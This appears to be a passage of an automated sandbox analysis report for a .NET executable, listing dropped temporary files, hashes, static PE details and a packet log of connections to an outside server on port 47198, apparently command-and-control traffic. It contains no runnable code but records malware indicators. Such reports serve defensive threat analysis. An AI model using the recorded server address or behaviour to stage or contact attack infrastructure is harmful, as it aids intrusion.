SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\Temp\tmpF8.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\Users\user\AppData\Local\Temp\tmpFA35.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFA46.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFA57.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFA58.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFA68.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFA79.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFA8A.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFA9A.tmp

Download File

Process:	C:\Users\user\Desktop\4JL966sxM4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2891393435168748
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
MD5:	037D23498B81732EEAAAD0E8015F3F85
SHA1:	E7719865D7717A4B36D85609F3EC25C10934587F
SHA-256:	83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
SHA-512:	BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.960745095300389
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	4JL966sxM4.exe
File size:	97'792 bytes
MD5:	b83c75e00f5f8d62de662451b631278b
SHA1:	8474a9f56f6d86b60a62df362dfa9cf80905b43a
SHA256:	64cb8d6034bd7bf642bcd0f0fc1606fa345fd0273546ae10f177c191320921e9
SHA512:	9e1d8785f712950c92b43eda0b8ee347e17e99065a0bd0b9d58a9c0b1de8cad7e8e6e9ab2664f19f1a8e2e79aab36a3e9e84388bee6b44133e8829efd1bbce4e
SSDEEP:	1536:9Hqssfq28lbG6jejoigIY43Ywzi0Zb78ivombfexv0ujXyyed2z3teulgS6pM:91GhkYY+zi0ZbYe1g0ujyzdfM
TLSH:	56A35D30679C9F19EAFD1B74B4B2012043F1E08A9091FB4A4DC164E71FA7B866957EF2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........N.... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x41934e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x192f4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x4de	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x17354	0x17400	False	0.4488302251344086	data	6.015804158729418	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0x4de	0x600	False	0.3756510416666667	data	3.723940100220831	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1c000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1a0a0	0x254	data			0.4597315436241611
RT_MANIFEST	0x1a2f4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2023 21:07:28.139282942 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:28.361742020 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:28.362035990 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:28.380541086 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:28.900352955 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:28.900583982 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:28.908195972 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:29.209878922 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:29.227879047 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:29.229818106 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:29.283294916 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:29.539917946 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:29.540035009 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:34.331543922 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:34.331662893 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:34.639409065 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:34.665342093 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:34.665436029 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:34.665505886 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:34.665600061 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:34.665654898 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:34.665736914 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:34.665740967 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:34.720719099 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:34.854454994 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:34.854589939 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:37.167757034 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:37.288086891 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:37.475408077 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:37.475603104 CEST	47198	49706	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:37.475714922 CEST	49706	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:40.283200026 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:40.504776001 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:40.505023003 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:40.507453918 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:41.180536032 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:41.180660963 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:41.533873081 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:41.533905983 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:41.533955097 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:41.533979893 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:41.534007072 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:41.887212038 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:41.887311935 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:41.887547970 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:41.887625933 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:42.025144100 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:42.025203943 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:42.378199100 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:42.378300905 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:42.731821060 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:42.731951952 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:43.084800959 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:43.084947109 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:43.086046934 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:43.086047888 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:43.440304041 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:43.440460920 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:43.493386030 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:43.493482113 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:43.794290066 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:43.794466972 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:43.898473978 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:43.898566961 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.148454905 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.148597002 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.195230007 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.195358992 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.253932953 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.253998995 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.618604898 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.618697882 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.627891064 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.627948046 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.627973080 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.628027916 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.998600006 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.998708010 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:44.999296904 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:44.999356985 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:45.351471901 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:45.351613045 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:45.352237940 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:45.352303982 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:45.705775976 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:45.705884933 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.058660030 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.058799028 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.059516907 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.059542894 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.059557915 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.059588909 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.059588909 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.059617996 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.101572990 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.101715088 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.411431074 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.411529064 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.412565947 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.412630081 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:46.412730932 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:46.412774086 CEST	47198	49710	147.185.221.16	192.168.2.6
